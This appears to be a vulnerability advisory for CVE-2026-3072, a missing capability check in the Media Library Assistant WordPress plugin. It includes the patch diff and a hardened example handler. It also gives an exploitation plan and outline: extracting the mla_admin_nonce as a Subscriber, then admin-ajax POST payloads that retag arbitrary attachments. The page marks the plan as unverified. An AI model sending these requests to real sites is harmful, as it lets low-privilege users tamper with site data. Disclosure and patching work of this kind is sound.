CVE-2026-3072

Media Library Assistant <= 3.33 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Attachment Taxonomy Modification

Severity: medium
Type: Missing Authorization
CVSS Score: 4.3
Patched in: 3.34
Time to patch: 1d

Description

The Media Library Assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the mla_update_compat_fields_action() function in all versions up to, and including, 3.33. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify taxonomy terms on arbitrary attachments.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 3.33
Published: March 4, 2026
Last updated: March 5, 2026

What Changed in the Fix

Changes introduced in v3.34


Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-3072 (Media Library Assistant)

1. Vulnerability Summary

The Media Library Assistant plugin (versions <= 3.33) is vulnerable to Missing Authorization in its AJAX handler mla_update_compat_fields_action(). This function is intended to allow users to update metadata and taxonomy terms for attachments within the WordPress Media Modal. However, it fails to perform a capability check (e.g., current_user_can( 'edit_post', $attachment_id )) before processing updates. Consequently, any authenticated user with at least Subscriber-level access can modify the taxonomy terms (categories, tags, etc.) of any attachment on the site.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: mla-update-compat-fields (defined by MLACore::JAVASCRIPT_UPDATE_COMPAT_ACTION)
  • Vulnerable Parameter: attachments (an associative array of attachment data)
  • Required Authentication: Subscriber-level access or higher.
  • Preconditions:
    • The plugin must be active.
    • An attachment (Media Library item) must exist for which the ID is known.
    • A valid mla_admin_nonce is required for the request to pass initial validation.

3. Code Flow

  1. Hook Registration: In includes/class-mla-media-modal-ajax.php, the function MLAModal_Ajax::initialize() registers the AJAX action:
    add_action( 'wp_ajax_' . MLACore::JAVASCRIPT_UPDATE_COMPAT_ACTION, 'MLAModal_Ajax::mla_update_compat_fields_action' );
    
    MLACore::JAVASCRIPT_UPDATE_COMPAT_ACTION resolves to 'mla-update-compat-fields'.
  2. Entry Point: The request reaches MLAModal_Ajax::mla_update_compat_fields_action().
  3. Nonce Check: The function checks the mla_admin_nonce parameter using wp_verify_nonce() against the action mla_admin_nonce_action (from MLACore::MLA_ADMIN_NONCE_ACTION).
  4. Vulnerable Logic: The function iterates through the attachments array provided in the $_POST data. It identifies taxonomy fields (prefixed or managed by MLA) and calls wp_set_object_terms() or similar internal MLA functions to update the attachment's terms.
  5. Missing Sink Protection: The code lacks a call to current_user_can() to verify that the user has permission to edit the specific attachment or the taxonomy in question.

4. Nonce Acquisition Strategy

The mla_admin_nonce is required. It is generated using the action mla_admin_nonce_action. The plugin localizes this nonce for use in the Media Modal.

Strategy:

  1. Identify Source: The nonce is typically localized in a JavaScript object when a user opens the Media Modal (e.g., on post-new.php).
  2. Trigger Localization: Create a post as a Subscriber to ensure the Media Modal assets are enqueued.
  3. Execution:
    • Log in as a Subscriber.
    • Navigate to wp-admin/post-new.php.
    • Use browser_eval to find the localization variable. In MLA, nonces are often found in the mla_media_modal_vars object or similar variables registered via wp_localize_script.

Verification of Localization Keys:

  • Script handle: mla-media-modal-scripts (inferred) or mla-inline-edit-scripts (MLACore::JAVASCRIPT_INLINE_EDIT_SLUG).
  • Variable Name: mla_media_modal_vars or mla_inline_edit_vars.
  • Key: mla_admin_nonce (from MLACore::MLA_ADMIN_NONCE_NAME).

5. Exploitation Strategy

Step 1: Create Test Attachment (Admin)

As an admin, upload an image and get its ID (e.g., 123).

Step 2: Acquire Nonce (Subscriber)

  1. Log in as Subscriber.
  2. Navigate to wp-admin/post-new.php.
  3. Run browser_eval("window.mla_media_modal_vars?.mla_admin_nonce || window.mla_inline_edit_vars?.mla_admin_nonce").
  4. Store the nonce value.

Step 3: Execute Modification

Send a POST request to admin-ajax.php to add a tag to the target attachment.

Request Details:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=mla-update-compat-fields
    &id=123
    &mla_admin_nonce=[NONCE]
    &attachments[123][attachment_tag]=pwned
    
    (Note: attachment_tag is the default taxonomy used by MLA for media tags).

6. Test Data Setup

  1. Create Target Attachment:
    wp media import --post_id=1 https://wordpress.org/latest.tar.gz --title="Target Media"
    # Identify the ID (let's assume it's 5)
    
  2. Create Subscriber User:
    wp user create attacker attacker@example.com --role=subscriber --user_pass=attacker
    
  3. Define a Taxonomy Term: Ensure the term "pwned" or similar exists in attachment_tag.
    wp term create attachment_tag pwned
    

7. Expected Results

  • The AJAX response should return a success status (often JSON {"success": true}).
  • The target attachment (ID 5) will now have the term "pwned" associated with the attachment_tag taxonomy.

8. Verification Steps

  1. Check Terms via CLI:
    wp post term list 5 attachment_tag
    
    Confirm that "pwned" appears in the list.
  2. Check via SQL (Alternative):
    wp db query "SELECT t.name FROM wp_terms t INNER JOIN wp_term_taxonomy tt ON t.term_id = tt.term_id INNER JOIN wp_term_relationships tr ON tt.term_taxonomy_id = tr.term_taxonomy_id WHERE tr.object_id = 5"
    

9. Alternative Approaches

If attachment_tag is not modified, attempt modifying attachment_category (hierarchical) by providing a term ID:

action=mla-update-compat-fields
&id=5
&mla_admin_nonce=[NONCE]
&attachments[5][attachment_category][]=[TERM_ID]

If mla_update_compat_fields_action is not accessible to Subscribers directly, check if the nonce is leaked on the front-end via mla_gallery shortcodes if "Enhanced Media Library" features are enabled for the public. However, wp_ajax_ handlers are globally available to all authenticated users, so Subscriber access to the back-end (which is default for Subscriber) is sufficient.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Media Library Assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the mla_update_compat_fields_action() function in versions up to 3.33. This allows authenticated attackers with Subscriber-level access to modify taxonomy terms (categories, tags) on arbitrary attachments by bypassing intended access controls.

Vulnerable Code

// includes/class-mla-media-modal-ajax.php line 39
add_action( 'wp_ajax_' . MLACore::JAVASCRIPT_UPDATE_COMPAT_ACTION, 'MLAModal_Ajax::mla_update_compat_fields_action' );

---

// includes/class-mla-media-modal-ajax.php approx line 590
public static function mla_update_compat_fields_action() {
    // ... (logic follows to process $_POST['attachments'] without calling current_user_can())
    if ( empty( $_POST['attachments'] ) ) {
        wp_send_json_error();
    }
    // vulnerable processing starts here (remainder of the function elided)
}
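For comparison, the same handler shape written with the checks a defender would expect: CSRF first, then object-level authorization on the attachment, then a per-taxonomy assign_terms check. This is an added illustration, not Media Library Assistant's own code; the hook name, function name and request parsing are assumed, while the nonce action and field name are the values the page gives.

```php
<?php
// Added example, not the plugin's code. Assumes the request shape the advisory describes:
// 'id', a nonce field, and attachments[<id>][<taxonomy>] carrying term IDs or names.
add_action( 'wp_ajax_example_update_attachment_terms', 'example_update_attachment_terms' );

function example_update_attachment_terms() {
    // 1. CSRF: reject requests without a valid nonce before touching anything else
    //    (nonce action/name values are the ones the page lists for MLA).
    check_ajax_referer( 'mla_admin_nonce_action', 'mla_admin_nonce' );

    // 2. Input: the ID must be a positive integer naming a real attachment.
    $post_id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( ! $post_id || 'attachment' !== get_post_type( $post_id ) ) {
        wp_send_json_error( 'invalid attachment' );
    }

    // 3. Object-level authorization: the check the vulnerable version lacked.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'forbidden' );
    }

    $fields = isset( $_POST['attachments'][ $post_id ] ) ? (array) $_POST['attachments'][ $post_id ] : array();

    foreach ( $fields as $taxonomy => $value ) {
        $taxonomy = sanitize_key( $taxonomy );
        $tax_obj  = get_taxonomy( $taxonomy );

        // 4. Only taxonomies registered for attachments, and only if this user may assign terms.
        if ( ! $tax_obj || ! is_object_in_taxonomy( 'attachment', $taxonomy ) ) {
            continue;
        }
        if ( ! current_user_can( $tax_obj->cap->assign_terms ) ) {
            continue;
        }

        // Hierarchical taxonomies arrive as term IDs, flat ones as a comma-separated name list.
        if ( $tax_obj->hierarchical ) {
            $terms = array_map( 'intval', (array) $value );
        } else {
            $terms = array_filter( array_map( 'trim', explode( ',', sanitize_text_field( wp_unslash( $value ) ) ) ) );
        }

        $result = wp_set_object_terms( $post_id, $terms, $taxonomy );
        if ( is_wp_error( $result ) ) {
            wp_send_json_error( $result->get_error_message() );
        }
    }

    wp_send_json_success( array( 'id' => $post_id ) );
}
```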

Security Fix

--- /home/deploy/wp-safety.org/data/plugin-versions/media-library-assistant/3.33/includes/class-mla-media-modal-ajax.php	2026-01-30 04:23:54.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/media-library-assistant/3.34/includes/class-mla-media-modal-ajax.php	2026-02-26 01:12:48.000000000 +0000
@@ -598,6 +598,12 @@
 			wp_send_json_error();
 		}
 
+		if ( ! current_user_can( 'edit_post', $post_id ) ) {
+			wp_send_json_error();
+		}
+
+		check_ajax_referer( MLACore::MLA_ADMIN_NONCE_ACTION, MLACore::MLA_ADMIN_NONCE_NAME );
+
 		if ( empty( $post ) ) {
 			$post = get_post( $post_id ); // for filters and wp_popular_terms_checklist
 		}
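Review bot: the new `current_user_can( 'edit_post', $post_id )` check runs before `check_ajax_referer()`, and the hunk does not show where `$post_id` is assigned or cast; prefer verifying the nonce first so forged cross-site requests are rejected before any user-specific logic, and confirm earlier in the function that `$post_id` is an integer taken from the request (e.g. `absint( $_POST['id'] )`) and actually refers to an attachment before it reaches the capability check.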

Exploit Outline

  1. Login to the WordPress site as a Subscriber-level user.
  2. Access a page where the Media Library Assistant scripts are enqueued (e.g., /wp-admin/post-new.php) and extract the 'mla_admin_nonce' from the 'mla_media_modal_vars' JavaScript object.
  3. Identify the ID of a target attachment (media item) to modify.
  4. Send a POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'mla-update-compat-fields'.
  5. Include the target ID in the 'id' parameter and the nonce in the 'mla_admin_nonce' parameter.
  6. Include an 'attachments' array payload where the key is the attachment ID and the value is an array specifying the taxonomy to modify (e.g., attachments[123][attachment_tag]=malicious_tag).
  7. The plugin will process the update using wp_set_object_terms or similar without verifying if the current user has the 'edit_post' capability for that specific attachment.
